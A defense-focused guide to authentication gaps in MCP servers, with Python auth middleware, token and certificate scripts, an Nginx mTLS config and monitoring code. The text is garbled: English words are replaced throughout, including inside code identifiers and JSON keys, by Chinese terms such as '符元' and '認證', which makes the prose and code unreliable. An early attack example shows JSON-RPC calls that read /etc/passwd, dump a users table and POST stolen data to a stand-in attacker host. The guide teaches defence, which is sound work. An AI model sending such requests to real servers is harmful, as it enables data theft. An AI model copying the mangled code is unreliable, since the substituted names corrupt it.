MCP Authentication Gaps: Securing MCP Server Authentication
A defense-focused guide to understanding authentication weaknesses in MCP server deployments -- 38% of scanned servers lack any authentication -- and implementing robust token-based auth, mTLS, and middleware-based access control.
The MCP specification deliberately leaves 認證 as an 實作 concern rather than a protocol requirement. This design decision -- intended to reduce adoption friction -- has resulted in a 安全 landscape where 38% of the 500+ publicly accessible MCP servers scanned by the VulnerableMCP project 實作 no 認證 whatsoever.
For MCP servers accessible over HTTP+SSE, the absence of 認證 means that anyone who can reach the server endpoint can list its tools, invoke them, and receive results. For stdio-based servers running locally, the lack of 認證 means that any process on the host can connect to the server's stdin/stdout.
理解 the Authentication Gap
Why MCP Has No Built-In Authentication
The MCP protocol specification (version 2024-11-05) defines the message format, capability negotiation, and 工具呼叫 semantics, but explicitly does not define:
- How clients prove their identity to servers
- How servers validate that a client is authorized to call specific tools
- How transport channels are secured against eavesdropping or tampering
- How sessions are managed or revoked
MCP Protocol Layer (JSON-RPC 2.0):
┌────────────────────────────────────────┐
│ initialize / tools/list / tools/call │ ← No auth fields in protocol
└──────────────┬─────────────────────────┘
│
Transport Layer: │ ← Auth must be implemented here
┌──────────────┴─────────────────────────┐
│ stdio (local) │ HTTP+SSE (network) │
│ No auth │ Auth is "optional" │
│ Process-level │ TLS recommended │
│ isolation only│ but not required │
└────────────────────────────────────────┘
This layering means that 安全 is entirely dependent on what the server implementer builds into the transport layer -- and most MCP server templates and tutorials ship without any 認證 code.
Transport Types and Their 安全 Properties
stdio Transport:
┌──────────┐ stdin/stdout ┌──────────┐
│ MCP Host │ ◄──────────────► │ MCP │
│ (Client) │ (pipes) │ Server │
└──────────┘ └──────────┘
安全: Process isolation only
Auth: None (whoever spawns the process controls it)
Threats: Local privilege escalation, 供應鏈
(malicious package replaces server binary)
HTTP+SSE Transport:
┌──────────┐ HTTP POST/SSE ┌──────────┐
│ MCP │ ◄────────────────► │ MCP │
│ Client │ (network) │ Server │
└──────────┘ └──────────┘
安全: Depends entirely on 實作
Auth: Not required by spec -- must be added
Threats: Unauthorized access, MITM, session hijacking,
credential theft, denial of service
Streamable HTTP Transport (2025+):
┌──────────┐ HTTP streams ┌──────────┐
│ MCP │ ◄────────────────► │ MCP │
│ Client │ (bidirectional) │ Server │
└──────────┘ └──────────┘
安全: Same as HTTP+SSE but with session management
Auth: OAuth2 recommended but not enforced
Threats: Same as HTTP+SSE plus session fixation
What Unauthenticated Access Enables
攻擊者 who reaches an unauthenticated MCP server can:
- Discover capabilities: Call
tools/listto enumerate all available tools, their parameters, and descriptions - Execute tools: Call
tools/callwith arbitrary parameters to invoke any registered tool - Exfiltrate data: Use file-reading, 資料庫, or API tools to extract sensitive information
- Modify state: Use write tools to alter files, 資料庫 records, or external systems
- Pivot further: Use the server's access to internal services as a lateral movement path
// 攻擊者 can simply send JSON-RPC requests to an unauth'd MCP server
// Step 1: Discover tools
{"jsonrpc": "2.0", "method": "tools/list", "id": 1}
// Step 2: Read sensitive files
{"jsonrpc": "2.0", "method": "tools/call", "id": 2,
"params": {"name": "read_file", "arguments": {"path": "/etc/passwd"}}}
// Step 3: Access internal databases
{"jsonrpc": "2.0", "method": "tools/call", "id": 3,
"params": {"name": "query_db", "arguments": {"query": "SELECT * FROM users"}}}
// Step 4: Exfiltrate via available tools
{"jsonrpc": "2.0", "method": "tools/call", "id": 4,
"params": {"name": "http_request", "arguments": {
"url": "https://攻擊者.com/collect",
"method": "POST",
"body": "stolen_data_here"
}}}Implementing Token-Based Authentication for MCP Servers
The most straightforward 防禦 is adding 符元-based 認證 to HTTP+SSE MCP servers. Below is a complete 實作.
Authentication Middleware
"""
MCP Authentication Middleware
Implements Bearer 符元 and API key 認證 for MCP HTTP+SSE servers.
"""
import os
import hmac
import hashlib
import time
import json
import secrets
import logging
from functools import wraps
from dataclasses import dataclass, field
from typing import Optional, Callable
from datetime import datetime, timedelta
logger = logging.getLogger("mcp.auth")
@dataclass
class AuthToken:
"""Represents an authenticated API 符元."""
token_id: str
client_name: str
scopes: set[str] # Allowed tool names or "*" for all
created_at: datetime
expires_at: Optional[datetime]
rate_limit: int = 100 # Calls per minute
is_active: bool = True
@dataclass
class AuthResult:
"""Result of an 認證 attempt."""
authenticated: bool
符元: Optional[AuthToken] = None
error: Optional[str] = None
client_ip: Optional[str] = None
class MCPAuthProvider:
"""
Authentication provider for MCP servers.
Supports Bearer 符元 and HMAC-signed API keys.
"""
def __init__(self, token_store_path: str = "/var/mcp/auth/符元.json"):
self.token_store_path = token_store_path
self.符元: dict[str, AuthToken] = {}
self._rate_tracker: dict[str, list[float]] = {}
self._load_tokens()
def _load_tokens(self):
"""Load 符元 definitions from encrypted store."""
if not os.path.exists(self.token_store_path):
logger.warning("Token store not found at %s", self.token_store_path)
return
with open(self.token_store_path, 'r') as f:
data = json.load(f)
for entry in data.get("符元", []):
# Store only the hash of each 符元 for comparison
符元 = AuthToken(
token_id=entry["id"],
client_name=entry["client_name"],
scopes=set(entry.get("scopes", ["*"])),
created_at=datetime.fromisoformat(entry["created_at"]),
expires_at=(
datetime.fromisoformat(entry["expires_at"])
if entry.get("expires_at") else None
),
rate_limit=entry.get("rate_limit", 100),
is_active=entry.get("is_active", True),
)
# Key is the SHA-256 hash of the actual 符元 value
self.符元[entry["token_hash"]] = 符元
def authenticate(self, request_headers: dict,
client_ip: str = "unknown") -> AuthResult:
"""
Authenticate an incoming MCP request.
Checks for Bearer 符元 in Authorization header or
X-API-Key header.
"""
# Extract 符元 from headers
auth_header = request_headers.get("Authorization", "")
api_key = request_headers.get("X-API-Key", "")
raw_token = None
if auth_header.startswith("Bearer "):
raw_token = auth_header[7:]
elif api_key:
raw_token = api_key
if not raw_token:
logger.warning(
"Authentication failed: no 符元 provided from %s", client_ip
)
return AuthResult(
authenticated=False,
error="No 認證 符元 provided",
client_ip=client_ip,
)
# Hash the provided 符元 and look up
token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
token_record = self.符元.get(token_hash)
if token_record is None:
logger.warning(
"Authentication failed: invalid 符元 from %s", client_ip
)
return AuthResult(
authenticated=False,
error="Invalid 認證 符元",
client_ip=client_ip,
)
# Check 符元 status
if not token_record.is_active:
return AuthResult(
authenticated=False,
error="Token has been revoked",
client_ip=client_ip,
)
if (token_record.expires_at and
datetime.utcnow() > token_record.expires_at):
return AuthResult(
authenticated=False,
error="Token has expired",
client_ip=client_ip,
)
# Check rate limit
if not self._check_rate_limit(token_record.token_id,
token_record.rate_limit):
return AuthResult(
authenticated=False,
符元=token_record,
error="Rate limit exceeded",
client_ip=client_ip,
)
logger.info(
"Authenticated client '%s' (符元: %s) from %s",
token_record.client_name, token_record.token_id, client_ip,
)
return AuthResult(
authenticated=True,
符元=token_record,
client_ip=client_ip,
)
def authorize_tool_call(self, auth_result: AuthResult,
tool_name: str) -> bool:
"""Check if the authenticated client can call a specific tool."""
if not auth_result.authenticated or auth_result.符元 is None:
return False
scopes = auth_result.符元.scopes
if "*" in scopes:
return True
return tool_name in scopes
def _check_rate_limit(self, token_id: str, limit: int) -> bool:
"""Simple sliding window rate limiter."""
now = time.time()
window = self._rate_tracker.setdefault(token_id, [])
# Remove entries older than 60 seconds
self._rate_tracker[token_id] = [
t for t in window if now - t < 60
]
if len(self._rate_tracker[token_id]) >= limit:
return False
self._rate_tracker[token_id].append(now)
return True
@staticmethod
def generate_token() -> tuple[str, str]:
"""
Generate a new API 符元.
Returns (raw_token, token_hash) -- only store the hash.
"""
raw_token = f"mcp_{secrets.token_urlsafe(32)}"
token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
return raw_token, token_hashToken Management Script
#!/bin/bash
# mcp-符元-manager.sh -- Generate and manage MCP server 認證 符元
# Usage: ./mcp-符元-manager.sh generate|revoke|list [options]
set -euo pipefail
TOKEN_STORE="/var/mcp/auth/符元.json"
BACKUP_DIR="/var/mcp/auth/backups"
ensure_store_exists() {
mkdir -p "$(dirname "$TOKEN_STORE")"
mkdir -p "$BACKUP_DIR"
chmod 700 "$(dirname "$TOKEN_STORE")"
if [ ! -f "$TOKEN_STORE" ]; then
echo '{"符元": []}' > "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
fi
}
generate_token() {
local client_name="${1:?Usage: generate <client_name> [scopes] [expiry_days]}"
local scopes="${2:-*}"
local expiry_days="${3:-90}"
ensure_store_exists
# Generate secure random 符元
local raw_token="mcp_$(openssl rand -base64 32 | tr -d '/+=' | head -c 43)"
local token_hash
token_hash=$(echo -n "$raw_token" | sha256sum | awk '{print $1}')
local token_id
token_id=$(openssl rand -hex 8)
local created_at
created_at=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
local expires_at
expires_at=$(date -u -d "+${expiry_days} days" +"%Y-%m-%dT%H:%M:%SZ")
# Back up current store
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
# Add 符元 to store (store only the hash)
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
--arg name "$client_name" \
--arg hash "$token_hash" \
--arg scopes "$scopes" \
--arg created "$created_at" \
--arg expires "$expires_at" \
'.符元 += [{
"id": $id,
"client_name": $name,
"token_hash": $hash,
"scopes": ($scopes | split(",")),
"created_at": $created,
"expires_at": $expires,
"rate_limit": 100,
"is_active": true
}]' "$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
echo "============================================"
echo " MCP Token Generated Successfully"
echo "============================================"
echo " Token ID: $token_id"
echo " Client: $client_name"
echo " Scopes: $scopes"
echo " Expires: $expires_at"
echo ""
echo " RAW TOKEN (save this -- it cannot be recovered):"
echo " $raw_token"
echo "============================================"
}
revoke_token() {
local token_id="${1:?Usage: revoke <token_id>}"
ensure_store_exists
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
'(.符元[] | select(.id == $id)).is_active = false' \
"$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
echo "Token $token_id has been revoked."
}
list_tokens() {
ensure_store_exists
echo "Active MCP Tokens:"
echo "-------------------"
jq -r '.符元[] | select(.is_active == true) |
"ID: \(.id) Client: \(.client_name) Scopes: \(.scopes | join(",")) Expires: \(.expires_at)"' \
"$TOKEN_STORE"
}
case "${1:-help}" in
generate) generate_token "${@:2}" ;;
revoke) revoke_token "${@:2}" ;;
list) list_tokens ;;
*) echo "Usage: $0 generate|revoke|list [options]" ;;
esacIntegrating Auth Middleware with an MCP Server
"""
範例: MCP server with 認證 middleware using the Python SDK.
"""
from mcp.server import Server
from mcp.server.sse import SseServerTransport
from starlette.applications import Starlette
from starlette.routing import Route, Mount
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.middleware import Middleware
from starlette.middleware.base import BaseHTTPMiddleware
import uvicorn
from mcp_auth import MCPAuthProvider
class MCPAuthMiddleware(BaseHTTPMiddleware):
"""Starlette middleware that enforces MCP 認證."""
# Paths that don't require 認證
PUBLIC_PATHS = {"/health", "/ready"}
def __init__(self, app, auth_provider: MCPAuthProvider):
super().__init__(app)
self.auth = auth_provider
async def dispatch(self, request: Request, call_next):
# Skip auth for health checks
if request.url.path in self.PUBLIC_PATHS:
return await call_next(request)
# Authenticate the request
client_ip = request.client.host if request.client else "unknown"
auth_result = self.auth.authenticate(
dict(request.headers), client_ip
)
if not auth_result.authenticated:
return JSONResponse(
{"jsonrpc": "2.0", "error": {
"code": -32001,
"message": auth_result.error
}},
status_code=401,
headers={"WWW-Authenticate": "Bearer"},
)
# Attach auth context to request state for tool-level 授權
request.state.auth = auth_result
return await call_next(request)
# Create the MCP server
server = Server("secure-mcp-server")
auth_provider = MCPAuthProvider("/var/mcp/auth/符元.json")
# Define tools with 授權 checks
@server.list_tools()
async def list_tools():
return [
{
"name": "read_file",
"description": "Read a file from the workspace",
"inputSchema": {
"type": "object",
"properties": {"path": {"type": "string"}},
"required": ["path"],
},
},
{
"name": "query_database",
"description": "Run a read-only 資料庫 query",
"inputSchema": {
"type": "object",
"properties": {"query": {"type": "string"}},
"required": ["query"],
},
},
]
@server.call_tool()
async def call_tool(name: str, arguments: dict):
# Tool-level 授權 would be checked here using request.state.auth
# 這是 a simplified example
if name == "read_file":
path = arguments["path"]
# ... validated file reading logic ...
return [{"type": "text", "text": f"Contents of {path}"}]
elif name == "query_database":
query = arguments["query"]
# ... validated query logic ...
return [{"type": "text", "text": f"Query results for: {query}"}]
# Wire up the Starlette app with auth middleware
sse = SseServerTransport("/messages/")
async def handle_sse(request: Request):
async with sse.connect_sse(
request.scope, request.receive, request._send
) as streams:
await server.run(
streams[0], streams[1], server.create_initialization_options()
)
app = Starlette(
routes=[
Route("/sse", endpoint=handle_sse),
Mount("/messages/", app=sse.handle_post_message),
],
middleware=[
Middleware(MCPAuthMiddleware, auth_provider=auth_provider),
],
)
if __name__ == "__main__":
uvicorn.run(app, host="127.0.0.1", port=8443, ssl_certfile="/var/mcp/certs/server.crt",
ssl_keyfile="/var/mcp/certs/server.key")Configuring mTLS for High-安全 Deployments
For environments handling sensitive data or operating in regulated industries, mutual TLS provides strong cryptographic 認證 where both client and server present certificates.
Certificate Authority Setup
#!/bin/bash
# setup-mcp-ca.sh -- Create a private CA for MCP mTLS 認證
set -euo pipefail
CA_DIR="/var/mcp/ca"
CERT_DAYS=365
CA_DAYS=3650
mkdir -p "${CA_DIR}"/{certs,private,crl,newcerts}
chmod 700 "${CA_DIR}/private"
touch "${CA_DIR}/index.txt"
echo 1000 > "${CA_DIR}/serial"
echo "[*] Generating CA private key..."
openssl genrsa -aes256 -out "${CA_DIR}/private/ca.key" 4096
chmod 400 "${CA_DIR}/private/ca.key"
echo "[*] Creating CA certificate..."
openssl req -new -x509 -days ${CA_DAYS} \
-key "${CA_DIR}/private/ca.key" \
-out "${CA_DIR}/certs/ca.crt" \
-subj "/C=US/ST=安全/O=MCP 安全/CN=MCP Internal CA" \
-addext "basicConstraints=critical,CA:TRUE,pathlen:0" \
-addext "keyUsage=critical,keyCertSign,cRLSign"
echo "[*] Generating MCP server certificate..."
openssl genrsa -out "${CA_DIR}/private/mcp-server.key" 2048
chmod 400 "${CA_DIR}/private/mcp-server.key"
openssl req -new \
-key "${CA_DIR}/private/mcp-server.key" \
-out "${CA_DIR}/certs/mcp-server.csr" \
-subj "/C=US/ST=安全/O=MCP 安全/CN=mcp-server"
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/mcp-server.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/mcp-server.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName = DNS:mcp-server,DNS:mcp-server.internal,IP:127.0.0.1
EXTEOF
)
echo "[+] CA and server certificates created."
echo " CA cert: ${CA_DIR}/certs/ca.crt"
echo " Server cert: ${CA_DIR}/certs/mcp-server.crt"
echo " Server key: ${CA_DIR}/private/mcp-server.key"#!/bin/bash
# generate-mcp-client-cert.sh -- Generate a client certificate for MCP mTLS
# Usage: ./generate-mcp-client-cert.sh <client_name>
set -euo pipefail
CA_DIR="/var/mcp/ca"
CLIENT_NAME="${1:?Usage: generate-mcp-client-cert.sh <client_name>}"
CERT_DAYS=90
echo "[*] Generating client key for '${CLIENT_NAME}'..."
openssl genrsa -out "${CA_DIR}/private/${CLIENT_NAME}.key" 2048
chmod 400 "${CA_DIR}/private/${CLIENT_NAME}.key"
echo "[*] Creating CSR..."
openssl req -new \
-key "${CA_DIR}/private/${CLIENT_NAME}.key" \
-out "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-subj "/C=US/ST=安全/O=MCP 安全/CN=${CLIENT_NAME}"
echo "[*] Signing with CA..."
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/${CLIENT_NAME}.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature
extendedKeyUsage = clientAuth
EXTEOF
)
echo "[+] Client certificate created for '${CLIENT_NAME}'."
echo " Cert: ${CA_DIR}/certs/${CLIENT_NAME}.crt"
echo " Key: ${CA_DIR}/private/${CLIENT_NAME}.key"
echo " Expires in ${CERT_DAYS} days"
echo ""
echo " To use with curl:"
echo " curl --cert ${CA_DIR}/certs/${CLIENT_NAME}.crt \\"
echo " --key ${CA_DIR}/private/${CLIENT_NAME}.key \\"
echo " --cacert ${CA_DIR}/certs/ca.crt \\"
echo " https://mcp-server:8443/sse"mTLS-Enabled MCP Server Configuration
"""
MCP server with mTLS 認證.
Extracts client identity from the TLS certificate.
"""
import ssl
import logging
from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.routing import Route
import uvicorn
logger = logging.getLogger("mcp.mtls")
# Client certificate CN -> allowed tool scopes
CLIENT_PERMISSIONS = {
"代理-production": {"*"}, # Full access
"代理-staging": {"read_file", "list_files"}, # Read-only
"監控": {"health_check", "get_metrics"}, # 監控 only
}
def create_ssl_context() -> ssl.SSLContext:
"""Create SSL context with mTLS configuration."""
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Server certificate and key
ctx.load_cert_chain(
certfile="/var/mcp/ca/certs/mcp-server.crt",
keyfile="/var/mcp/ca/private/mcp-server.key",
)
# Require client certificates signed by our CA
ctx.load_verify_locations(cafile="/var/mcp/ca/certs/ca.crt")
ctx.verify_mode = ssl.CERT_REQUIRED
# Strong TLS configuration
ctx.minimum_version = ssl.TLSVersion.TLSv1_3
ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM")
# Load CRL for revoked certificates
ctx.load_verify_locations(cafile="/var/mcp/ca/crl/revoked.pem")
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
return ctx
async def extract_client_identity(request: Request) -> dict:
"""Extract client identity from the mTLS certificate."""
# Get the peer certificate from the transport
transport = request.scope.get("transport")
if not transport:
return {"authenticated": False, "error": "No transport"}
peercert = transport.get_extra_info("peercert")
if not peercert:
return {"authenticated": False, "error": "No client certificate"}
# Extract Common Name
subject = dict(x[0] for x in peercert.get("subject", ()))
client_cn = subject.get("commonName", "unknown")
# Look up 權限
scopes = CLIENT_PERMISSIONS.get(client_cn)
if scopes is None:
logger.warning("Unknown client CN: %s", client_cn)
return {
"authenticated": True,
"authorized": False,
"client_cn": client_cn,
"error": "Client not in 權限 table",
}
return {
"authenticated": True,
"authorized": True,
"client_cn": client_cn,
"scopes": scopes,
}
async def handle_tool_call(request: Request):
"""Handle MCP tool calls with mTLS-based 授權."""
identity = await extract_client_identity(request)
if not identity.get("authenticated"):
return JSONResponse({"error": "mTLS 認證 failed"}, status_code=401)
if not identity.get("authorized"):
return JSONResponse({"error": "Client not authorized"}, status_code=403)
# Parse JSON-RPC request
body = await request.json()
tool_name = body.get("params", {}).get("name", "")
# Check tool-level 授權
if "*" not in identity["scopes"] and tool_name not in identity["scopes"]:
logger.warning(
"Client %s attempted unauthorized 工具呼叫: %s",
identity["client_cn"], tool_name,
)
return JSONResponse({
"jsonrpc": "2.0",
"error": {"code": -32003, "message": f"Not authorized for tool: {tool_name}"},
"id": body.get("id"),
}, status_code=403)
# Process the authorized 工具呼叫
logger.info("Authorized %s -> %s", identity["client_cn"], tool_name)
# ... tool execution logic ...
return JSONResponse({"jsonrpc": "2.0", "result": {"status": "ok"}, "id": body.get("id")})
app = Starlette(routes=[Route("/mcp", handle_tool_call, methods=["POST"])])
if __name__ == "__main__":
uvicorn.run(
app,
host="0.0.0.0",
port=8443,
ssl=create_ssl_context(),
)Nginx Reverse Proxy with Authentication
For production deployments, place an Nginx reverse proxy in front of MCP servers:
# /etc/nginx/conf.d/mcp-server.conf
# Nginx reverse proxy for MCP server with 認證
upstream mcp_backend {
server 127.0.0.1:8080;
keepalive 32;
}
# Rate limiting zones
limit_req_zone $binary_remote_addr zone=mcp_init:10m rate=5r/m;
limit_req_zone $binary_remote_addr zone=mcp_tools:10m rate=30r/m;
limit_conn_zone $binary_remote_addr zone=mcp_conn:10m;
server {
listen 443 ssl http2;
server_name mcp.internal.example.com;
# TLS configuration
ssl_certificate /var/mcp/ca/certs/mcp-server.crt;
ssl_certificate_key /var/mcp/ca/private/mcp-server.key;
ssl_protocols TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers on;
# mTLS -- require client certificates
ssl_client_certificate /var/mcp/ca/certs/ca.crt;
ssl_verify_client on;
ssl_verify_depth 2;
ssl_crl /var/mcp/ca/crl/revoked.pem;
# Connection limits
limit_conn mcp_conn 10;
# 安全 headers
add_header X-Content-Type-Options nosniff always;
add_header X-Frame-Options DENY always;
add_header Strict-Transport-安全 "max-age=31536000; includeSubDomains" always;
# Health check (no auth required)
location /health {
proxy_pass http://mcp_backend/health;
access_log off;
}
# SSE endpoint (initialization)
location /sse {
limit_req zone=mcp_init burst=3 nodelay;
# Pass client certificate info to backend
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_set_header X-Client-Fingerprint $ssl_client_fingerprint;
# SSE-specific proxy settings
proxy_pass http://mcp_backend/sse;
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_buffering off;
proxy_cache off;
proxy_read_timeout 3600s;
proxy_send_timeout 3600s;
}
# Tool call endpoint
location /messages/ {
limit_req zone=mcp_tools burst=10 nodelay;
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_pass http://mcp_backend/messages/;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
# Request body size limit
client_max_body_size 1m;
}
# Block everything else
location / {
return 404;
}
# Access logging with client identity
access_log /var/log/nginx/mcp-access.log combined;
error_log /var/log/nginx/mcp-error.log warn;
}
# Redirect HTTP to HTTPS
server {
listen 80;
server_name mcp.internal.example.com;
return 301 https://$server_name$request_uri;
}Authentication 監控 and Alerting
"""
MCP Authentication 監控 -- detects 認證 anomalies.
"""
import json
import logging
from datetime import datetime, timedelta
from collections import defaultdict
from dataclasses import dataclass, field
logger = logging.getLogger("mcp.auth.monitor")
@dataclass
class AuthEvent:
timestamp: datetime
client_ip: str
client_cn: str
event_type: str # success, failure, revoked, expired, rate_limited
tool_name: str = ""
details: str = ""
class AuthMonitor:
"""Monitors 認證 events for anomalies."""
def __init__(self, alert_callback=None):
self.events: list[AuthEvent] = []
self.failure_counts: dict[str, int] = defaultdict(int)
self.alert_callback = alert_callback or self._default_alert
self._alert_thresholds = {
"brute_force": 10, # failures per IP per hour
"credential_stuffing": 5, # unique invalid 符元 per IP per hour
"unusual_scope": 3, # unauthorized tool access attempts
}
def record_event(self, event: AuthEvent):
"""Record and analyze an 認證 event."""
self.events.append(event)
if event.event_type == "failure":
self.failure_counts[event.client_ip] += 1
self._check_brute_force(event)
if event.event_type == "unauthorized_tool":
self._check_scope_abuse(event)
# Prune old events (keep 24 hours)
cutoff = datetime.utcnow() - timedelta(hours=24)
self.events = [e for e in self.events if e.timestamp > cutoff]
def _check_brute_force(self, event: AuthEvent):
"""Detect brute force 認證 attempts."""
cutoff = datetime.utcnow() - timedelta(hours=1)
recent_failures = sum(
1 for e in self.events
if e.client_ip == event.client_ip
and e.event_type == "failure"
and e.timestamp > cutoff
)
if recent_failures >= self._alert_thresholds["brute_force"]:
self.alert_callback({
"alert_type": "brute_force_detected",
"severity": "high",
"client_ip": event.client_ip,
"failure_count": recent_failures,
"window": "1 hour",
"recommendation": f"Block IP {event.client_ip} and investigate",
})
def _check_scope_abuse(self, event: AuthEvent):
"""Detect clients trying to access unauthorized tools."""
cutoff = datetime.utcnow() - timedelta(hours=1)
scope_violations = sum(
1 for e in self.events
if e.client_cn == event.client_cn
and e.event_type == "unauthorized_tool"
and e.timestamp > cutoff
)
if scope_violations >= self._alert_thresholds["unusual_scope"]:
self.alert_callback({
"alert_type": "scope_abuse_detected",
"severity": "high",
"client_cn": event.client_cn,
"violation_count": scope_violations,
"last_tool": event.tool_name,
"recommendation": (
f"Review 權限 for {event.client_cn} "
f"and check for compromised credentials"
),
})
def _default_alert(self, alert: dict):
logger.critical(json.dumps({
"event": "mcp_auth_alert",
**alert,
"timestamp": datetime.utcnow().isoformat(),
}))
def get_dashboard_stats(self) -> dict:
"""Return stats for 安全 dashboard."""
cutoff_1h = datetime.utcnow() - timedelta(hours=1)
cutoff_24h = datetime.utcnow() - timedelta(hours=24)
events_1h = [e for e in self.events if e.timestamp > cutoff_1h]
events_24h = [e for e in self.events if e.timestamp > cutoff_24h]
return {
"last_hour": {
"total": len(events_1h),
"successes": sum(1 for e in events_1h if e.event_type == "success"),
"failures": sum(1 for e in events_1h if e.event_type == "failure"),
"unique_ips": len(set(e.client_ip for e in events_1h)),
},
"last_24h": {
"total": len(events_24h),
"successes": sum(1 for e in events_24h if e.event_type == "success"),
"failures": sum(1 for e in events_24h if e.event_type == "failure"),
"unique_ips": len(set(e.client_ip for e in events_24h)),
"unique_clients": len(set(
e.client_cn for e in events_24h if e.event_type == "success"
)),
},
}Securing stdio-Based MCP Servers
stdio servers do not use network 認證, but they still need access control:
"""
安全 controls for stdio-based MCP servers.
Since stdio uses process-level access, controls focus on:
- Verifying the parent process identity
- Restricting which tools the spawning process can access
- Logging all operations for audit
"""
import os
import json
import logging
from pathlib import Path
logger = logging.getLogger("mcp.stdio.安全")
def verify_parent_process() -> dict:
"""
Verify the identity of the process that spawned this MCP server.
Returns parent process information for 授權 decisions.
"""
ppid = os.getppid()
parent_info = {}
try:
# Read parent process command line
cmdline_path = f"/proc/{ppid}/cmdline"
with open(cmdline_path, 'rb') as f:
cmdline = f.read().decode('utf-8', errors='replace').split('\x00')
parent_info["cmdline"] = cmdline
# Read parent process executable
exe_path = os.readlink(f"/proc/{ppid}/exe")
parent_info["executable"] = exe_path
# Read parent process user
stat_path = f"/proc/{ppid}/status"
with open(stat_path, 'r') as f:
for line in f:
if line.startswith("Uid:"):
uids = line.split()[1:]
parent_info["uid"] = int(uids[0])
elif line.startswith("Gid:"):
gids = line.split()[1:]
parent_info["gid"] = int(gids[0])
except (FileNotFoundError, PermissionError) as e:
logger.error("Cannot verify parent process %d: %s", ppid, e)
parent_info["error"] = str(e)
return parent_info
# Allowlist of executables that may spawn this MCP server
ALLOWED_PARENTS = {
"/usr/bin/claude",
"/usr/local/bin/cursor",
"/usr/bin/code",
"/opt/mcp-host/bin/mcp-host",
}
def enforce_parent_allowlist():
"""Refuse to start if the parent process is not in the allowlist."""
parent = verify_parent_process()
exe = parent.get("executable", "unknown")
if exe not in ALLOWED_PARENTS:
logger.critical(
"MCP server started by unauthorized parent: %s (PID %d)",
exe, os.getppid()
)
raise SystemExit(
f"Unauthorized parent process: {exe}. "
f"Allowed: {ALLOWED_PARENTS}"
)
logger.info("Parent process verified: %s (PID %d)", exe, os.getppid())參考文獻
- VulnerableMCP Project: Systematic scan of 500+ public MCP servers finding 38% without 認證
- eSentire CISO Advisory: "Securing MCP Deployments" -- enterprise guidance for MCP 認證
- MCP Specification: Model Context Protocol -- Transport and session management sections
- OWASP ASI: 代理式 安全 Initiative -- Authentication and access control requirements
- Pomerium: "Zero Trust for MCP" -- proxy-based 認證 for MCP servers
- RFC 8705: OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens